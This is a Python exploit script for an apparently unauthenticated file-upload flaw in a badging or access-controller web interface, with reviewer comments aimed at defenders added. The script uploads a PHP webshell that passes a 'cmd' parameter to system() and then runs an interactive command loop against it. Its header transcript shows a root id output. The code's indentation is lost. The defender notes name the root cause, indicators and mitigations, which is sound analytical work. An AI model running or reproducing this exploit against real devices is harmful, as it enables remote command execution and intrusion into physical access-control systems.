# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ exit
#
# [+] Deleting webshell.php file...
# [+] Done!
#
#####################################################################

import datetime
import requests
import sys#####
import os######

# Flat script: upload a PHP file through the badge-layout endpoint, then loop
# sending operator-typed commands to the uploaded file.
#
# NOTE(review): indentation was lost in this listing; the statements after the
# `if`, `while`, `try` and `except` headers presumably form their bodies. If
# the upload sits inside the loop, as its position suggests, it is repeated
# before every command.
#
# Reviewer notes for defenders:
# - Root cause shown here: the upload request carries no credentials or
#   session, the file name and .php extension are chosen by the client, and
#   the stored file is then requested under /badging/bg/ where it is run as
#   PHP. An upload handler should require authentication, restrict extensions
#   and content, and store files where the server will not execute them.
# - The header transcript shows the commands running as user lighttpd with
#   gid 0.
# - Indicators: a POST to /badging/badge_layout_new_v0.php whose "bg" part has
#   a .php file name; any .php file under /badging/bg/; GET requests to
#   /badging/bg/webshell.php with a `cmd` parameter. The User-Agent below is
#   specific to this script and easily changed, so it is a weak indicator.
# - The uploaded file is deleted only when the operator types "exit"; an
#   interrupted session leaves it on the device.
# - The header lists versions <=1.00-06 as affected and names no fixed
#   release; keep the controller's web interface off untrusted networks.
piton = os.path.basename(sys.argv[0])

# Upload endpoint and the path under which the uploaded file is later served.
badge = "/badging/badge_layout_new_v0.php"
shell = "/badging/bg/webshell.php"

if len(sys.argv) < 2:
print "nx20x20[*] Usage: "+piton+" n"
sys.exit()

ipaddr = sys.argv[1]
vremetodeneska = datetime.datetime.now()

print "Starting exploit at "+vremetodeneska.strftime("%d.%m.%Y %H:%M:%S")
print

while True:
try:
target = "http://"+ipaddr+badge

headers = {"User-Agent": "Brozilla/16.0",
"Accept": "anything",
"Accept-Language": "mk-MK,mk;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=----j",
"Connection": "close"}

# Hand-built multipart body with two parts: "layout_name" and a file part
# "bg" whose content is a short PHP script that passes the `cmd` request
# parameter to system().
payload = ("------jrnContent-Disposition: form-da"
"ta; name="layout_name"rnrnwebshel"
"l.phprn------jrnContent-Disposition"
": form-data; name="bg"; filename="we"
"bshell.php"rnContent-Type: applicati"
"on/octet-streamrnrn<?nif($_GET['cm"
"d']) {n system($_GET['cmd']);n }n?"
">nrn------j--rn")

requests.post(target, headers=headers, data=payload)

cmd = raw_input("lighttpd@"+ipaddr+":/spider/web/webroot/badging/bg$ ")
# The typed text is appended to the query string as-is (no URL encoding).
execute = requests.get("http://"+ipaddr+shell+"?cmd="+cmd)
print execute.text
if cmd.strip() == "exit":
print "[+] Deleting webshell.php file..."
requests.get("http://"+ipaddr+shell+"?cmd=rm%20webshell.php")
print "[+] Done!n"
break
else: continue
# Any failure ends the session with a generic message; the underlying error
# is not reported.
except Exception:
print "Error!"
break

sys.exit()
